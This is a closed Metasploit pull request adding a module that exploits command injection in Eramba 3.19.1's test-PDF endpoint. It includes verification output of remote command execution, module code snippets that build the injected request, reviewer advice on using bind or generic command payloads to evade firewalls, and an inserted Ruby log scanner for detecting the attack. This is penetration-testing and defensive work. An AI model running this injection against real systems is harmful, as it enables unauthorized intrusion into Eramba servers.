
Add Eramba Remote Code Execution Exploit #19494

Closed
wants to merge 2 commits into from

Conversation

trvnt-stefan

This PR adds a new auxiliary module to exploit an RCE vulnerability in the web application Eramba.

Verification

  1. Install the vulnerable Eramba version (3.19.1) (see Eramba Docker Install)
  2. Enable Debug mode in the Eramba web application
  3. Execute Metasploit script:
[*] Processing eramba.rc for ERB directives.
resource (eramba.rc)> use auxiliary/scanner/http/eramba_rce
resource (eramba.rc)> set RHOSTS 192.168.200.15
RHOSTS => 192.168.200.15
resource (eramba.rc)> set RPORT 8443
RPORT => 8443
resource (eramba.rc)> set USERNAME admin
USERNAME => admin
resource (eramba.rc)> set PASSWORD XXXYYYZZZ
PASSWORD => XXXYYYZZZ
resource (eramba.rc)> set COMMAND ls -la
COMMAND => ls -la
resource (eramba.rc)> run
[*] Running module against 192.168.200.15
[*] Retrieving CSRF token and session cookies...
[*] CSRF Token: uwAzmvLmg/nqp0FyMVfb8tNBZkb/zzG3Nky28Dr4/bNMAtyvDKdLqBMDzbMGyQROxZ3lQh10V1yAaR6lS35nRJyu3eFo1r4GtnBSdZv4A4YOdYXCCMuY1npnuM0+wnicJjGp0Wf5Mi/zrNV0KhVuOQ==
[*] Token Fields: c8bdd1a6b043b3dc109fe9564e2d55a26f684bd8%3A
[*] Token Unlocked: %7CmodalBreadcrumbs%7CmodalId
[*] Attempting to log in and redirect to command execution page...
[+] Login successful, redirected to command execution page.
[*] Session Cookies after cleaning: PHPSESSID=momnjit7odfjccqe4erho0j00t; translation=1;
[+] /settings/download-test-pdf?path=ls+-la;
[+] Command executed successfully. Response content:
total 88
drwxr-xr-x  9 www-data www-data  4096 Aug  7 13:59 .
drwxr-xr-x 17 www-data www-data  4096 Aug  7 13:59 ..
-rw-r--r--  1 www-data www-data   130 Oct 17  2022 .htaccess
-rw-r--r--  1 www-data www-data    11 Oct 17  2022 README.md
drwxr-xr-x  4 www-data www-data  4096 Aug  7 13:59 css
-rw-r--r--  1 www-data www-data  2529 Oct 17  2022 favicon.png
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 font
drwxr-xr-x  8 www-data www-data  4096 Aug  7 13:59 img
-rw-r--r--  1 www-data www-data  1387 Oct 17  2022 index.php
drwxr-xr-x 10 www-data www-data  4096 Aug  7 13:59 js
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 media
drwxr-xr-x  2 www-data www-data  4096 Aug  7 13:59 swagger
-rw-r--r--  1 www-data www-data    77 Oct 17  2022 test_pdf.html
-rw-r--r--  1 www-data www-data  6818 Oct 17  2022 test_pdf.pdf
drwxr-xr-x  4 www-data www-data  4096 Aug  7 13:59 tooltips
-rw-r--r--  1 www-data www-data   240 Oct 17  2022 updater_output.php
-rw-r--r--  1 www-data www-data 16901 Oct 17  2022 video-js.swf
[*] Auxiliary module execution completed
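As a defender-side companion to the verification output above: the Ruby script below is added here and is not part of the PR or of the Metasploit module. It scans web-server access logs for requests to the `/settings/download-test-pdf` endpoint whose `path` parameter carries shell metacharacters, which is what distinguishes the injection shown above (`path=ls+-la;`) from a benign file name. It assumes common log format lines; the sample lines are constructed for the example.

```ruby
require 'uri'

# Constructed sample access-log lines in common log format (not taken from the PR).
SAMPLE_LOG = <<~LOG
  192.168.200.50 - - [07/Aug/2024:14:01:02 +0000] "GET /settings/download-test-pdf?path=ls+-la%3B HTTP/1.1" 500 512
  192.168.200.51 - - [07/Aug/2024:14:01:05 +0000] "GET /settings/download-test-pdf?path=whoami; HTTP/1.1" 500 77
  192.168.200.52 - - [07/Aug/2024:14:02:10 +0000] "GET /settings/download-test-pdf HTTP/1.1" 200 6818
  192.168.200.53 - - [07/Aug/2024:14:03:00 +0000] "POST /login HTTP/1.1" 302 0
LOG

# Matches client IP, timestamp, method, request target and status of a
# common-log-format line.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# The endpoint named in the PR, and the shell metacharacters that indicate the
# `path` value is being used as a command rather than as a file name.
VULN_ENDPOINT = '/settings/download-test-pdf'
SHELL_META = /[;|&`$<>\n]/

# Returns the decoded `path` query parameter of a request target, or nil when
# the target is not the vulnerable endpoint or carries no `path` parameter.
def extract_path_param(target)
  uri = URI.parse(target)
  return nil unless uri.path.end_with?(VULN_ENDPOINT) && uri.query

  # decode_www_form handles '+' and %XX and splits only on '&', so a literal
  # ';' in the value survives (CGI.parse would split on it).
  pairs = URI.decode_www_form(uri.query)
  pair = pairs.find { |k, _| k == 'path' }
  pair && pair[1]
rescue URI::InvalidURIError
  nil
end

# Scans log text and returns one hash per request whose `path` parameter
# contains shell metacharacters: { ip:, ts:, status:, command: }.
def suspicious_requests(log_text)
  log_text.each_line.filter_map do |line|
    m = LOG_LINE.match(line) or next
    value = extract_path_param(m[:target]) or next
    next unless value.match?(SHELL_META)

    { ip: m[:ip], ts: m[:ts], status: m[:status].to_i, command: value }
  end
end

if $PROGRAM_NAME == __FILE__
  suspicious_requests(SAMPLE_LOG).each do |hit|
    puts "#{hit[:ts]} #{hit[:ip]} status=#{hit[:status]} path=#{hit[:command].inspect}"
  end
end
```

Both encoded (`%3B`) and raw (`;`) forms of the separator are decoded to the same value before matching, so an alert rule written against the raw request line alone would miss the first sample while this one catches both.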

@Chocapikk
Contributor

Hello @trvnt-stefan, is there a reason to code this as an auxiliary rather than writing this as an exploit and creating a meterpreter session?

'uri' => login_url
})

unless res && res.code == 200

Suggested change
unless res && res.code == 200
unless res&.code == 200

fail_with(Failure::UnexpectedReply, 'Failed to retrieve the login page')
end

doc = Nokogiri::HTML(res.body)

Suggested change
doc = Nokogiri::HTML(res.body)
doc = res.get_html_document

}
})

if res && res.code == 302

Suggested change
if res && res.code == 302
if res&.code == 302

})

print_good(redirect_url)
if res && res.code == 500

Suggested change
if res && res.code == 500
if res&.code == 500
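Review bot: a bare status check in `if res && res.code == 500` is a weak success signal. A 500 also comes back for any unrelated server-side error, so if that branch is what prints `Command executed successfully` together with the response body, an ordinary error page would be reported as command output. Consider verifying that the body actually contains the expected output before reporting success, and treating a 500 without it as `Failure::UnexpectedReply` rather than as a positive result.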

Comment on lines +110 to +112
command_encoded = URI.encode_www_form_component(datastore['COMMAND'].to_s)
redirect_path = "/settings/download-test-pdf?path=#{command_encoded};"
redirect_url = normalize_uri(target_uri.path, redirect_path.to_s)

Suggested change
command_encoded = URI.encode_www_form_component(datastore['COMMAND'].to_s)
redirect_path = "/settings/download-test-pdf?path=#{command_encoded};"
redirect_url = normalize_uri(target_uri.path, redirect_path.to_s)
redirect_path = "/settings/download-test-pdf?path=#{URI.encode_www_form_component(datastore['COMMAND'])};"
redirect_url = normalize_uri(target_uri.path, redirect_path)
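Review bot: hand-building the query string in `redirect_path = "/settings/download-test-pdf?path=#{command_encoded};"` leaves the trailing `;` unencoded and passes a query string through `normalize_uri`, which is meant for path segments. The framework convention is to give `send_request_cgi` the path via `normalize_uri(target_uri.path, 'settings', 'download-test-pdf')` and the parameter via `'vars_get' => { 'path' => "#{datastore['COMMAND']};" }`, letting the client do the encoding consistently. The `.to_s` on `datastore['COMMAND']` is also redundant, since `COMMAND` is declared as a required `OptString`.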

@Chocapikk
Contributor

@trvnt-stefan

When adding a module to Metasploit, it's essential to also include the corresponding documentation. This helps other users and developers understand how to use and test the module. Please refer to the following guide to learn how to write module documentation: https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html

OptString.new('TARGETURI', [ true, 'The base path to Eramba', '/']),
OptString.new('USERNAME', [ true, 'The username to authenticate with']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
OptString.new('COMMAND', [ true, 'The command to execute', 'whoami']),

This should really be an exploit module delivering an ARCH_CMD payload. That would allow the user to open a session and start a handler automatically. We also have generic command payloads if the user wants full control over the command and needs to, for example, execute whoami.


We are considering developing an Exploit module in addition to the Auxiliary one. Please see my comment below for the reasons why.


Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@ssmmkkxxzz

ssmmkkxxzz commented Oct 2, 2024

Hello @trvnt-stefan, is there a reason to code this as an auxiliary rather than writing this as an exploit and creating a meterpreter session?

Yes, we see the following advantages in providing separate modules for all RCE vulnerabilities, one under Auxiliary and one under Exploit. Firstly, the pure RCE provides more opportunities for an attacker to remain less visible; secondly, the FW rules on the victim side can prevent outbound connections; also, the environments can be configured completely differently, which we have already experienced in the production and test environments.
We can therefore consider developing an Exploit module in addition to the Auxiliary one.

@Chocapikk
Contributor

Hello @ssmmkkxxzz, if I'm not mistaken, you can actually run system commands directly from the exploit module using a custom payload. For example, you can set cmd/unix/generic as the payload and define the command like this:

set payload cmd/unix/generic
set CMD "whoami"

This way, the command will be executed without needing an auxiliary module or a reverse shell. It's simpler and keeps everything within the exploit.

@msutovsky-r7 msutovsky-r7 self-assigned this Jan 10, 2025
@msutovsky-r7 msutovsky-r7 removed their assignment Jan 24, 2025
@jheysel-r7
Contributor

Hey @trvnt-stefan, just checking in, as we'd love to see this module landed into the framework.

I too would agree that it would likely be best as a single exploit module, to reduce code duplication and to follow the existing convention of the framework.

As mentioned above an exploit module can use the cmd/unix/generic payload to send individual commands as desired by the msfconsole user.

Also, if outbound firewall rules and reverse shells are a concern, msfconsole users can select a bind shell payload (instead of a reverse shell) which will open an endpoint on the victim machine and allow an attacker to connect to it. This will appear as an inbound connection on the victim machine and might help bypass some of the FW rules mentioned.

Please let me know if you have any questions as I'd be happy to help.

@smcintyre-r7 smcintyre-r7 added the attic Older submissions that we still want to work on again label Mar 12, 2025

Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

  • It doesn't look like there has been any activity on this pull request in a while
  • We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
  • Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!

Labels
attic Older submissions that we still want to work on again needs-docs